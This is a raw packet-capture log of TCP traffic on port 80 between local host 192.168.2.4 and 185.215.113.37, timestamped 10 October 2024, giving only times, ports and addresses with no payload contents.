Oct 10, 2024 18:23:19.583378077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583408117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583410025 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583419085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583437920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583455086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583457947 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583458900 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583468914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583482027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583486080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583498001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583513975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583520889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583527088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583543062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583560944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583570957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583570957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583576918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583590031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583594084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583606958 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583619118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583635092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583646059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583646059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583646059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583662987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583674908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583693027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583694935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583694935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583705902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583722115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583734035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583744049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583744049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584036112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584058046 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584120989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584134102 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584198952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584211111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584213972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584232092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584244013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584255934 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584260941 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584260941 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584275007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584285021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584301949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584321976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584321976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584333897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584343910 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584362030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584373951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584383011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584383011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584389925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584405899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584424973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584438086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584445953 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584446907 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584455013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584466934 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584481955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584487915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584487915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584494114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584510088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584532976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584553957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584553957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584600925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584614038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584630013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584638119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584638119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584645033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.584678888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.584678888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585273027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585287094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585299015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585314035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585333109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585335016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585335016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585345984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585361958 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585374117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585388899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585391998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585391998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585402012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585417032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585429907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585438967 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585438967 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585443020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585459948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585472107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585488081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585494995 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585494995 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585503101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585517883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585527897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585546017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585561037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585571051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585571051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585576057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585591078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.585616112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585616112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585767984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.585993052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586004019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586020947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586031914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586045027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586070061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586070061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586107016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586143017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586157084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586170912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586184025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586188078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586198092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586219072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586230993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586239100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586239100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586246967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586258888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586273909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586296082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586308956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586313963 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586313963 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586323977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586338043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586349964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586363077 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586363077 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586366892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586379051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586395025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586406946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586416006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586416960 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586422920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.586476088 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.586476088 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587038040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587049961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587065935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587079048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587091923 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587096930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587096930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587125063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587141037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587153912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587167978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587167978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587167978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587182999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587194920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587208986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587220907 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587224007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587238073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587250948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587264061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587265968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587265968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587277889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587291002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587304115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587306023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587306023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587316990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587330103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587343931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587354898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587368011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587368011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587368011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587379932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587409019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.587410927 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587410927 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587457895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.587457895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588022947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588037968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588058949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588062048 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588073969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588089943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588104010 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588104010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588104010 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588116884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588133097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588145018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588160038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588160992 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588160992 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588172913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588187933 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588190079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588201046 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588217020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588228941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588246107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588248968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588248968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588258982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588290930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588301897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588301897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588305950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588318110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588330030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588368893 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588368893 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588691950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588706017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588718891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588732004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588746071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588752031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588752031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588762045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.588815928 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.588815928 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.589225054 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.589236021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.589265108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.589271069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.589366913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.591634035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591655016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591675997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591707945 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.591712952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591726065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591768980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.591768980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.591820002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591830969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591850042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591856003 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.591862917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591896057 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.591896057 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.591923952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591937065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591953993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.591991901 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.591991901 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.592011929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.592021942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.592047930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.592212915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.593224049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.593234062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.593252897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.593266964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.593348026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.593358994 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.593378067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.593381882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.593381882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.593390942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.593406916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.593427896 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.593427896 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.593528986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.634959936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.634985924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635000944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635035038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635045052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635046005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.635063887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635077000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635104895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.635104895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.635154963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635253906 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635266066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635282040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635294914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635304928 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.635304928 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.635308981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635325909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.635364056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.635364056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642206907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642226934 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642245054 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642281055 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642292976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642307043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642321110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642327070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642327070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642338037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642373085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642373085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642420053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642432928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642450094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642460108 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642466068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642554045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642565012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642584085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642601967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642615080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642628908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642628908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642632008 CEST	80	49731	185.215.113.37	192.168.2.4
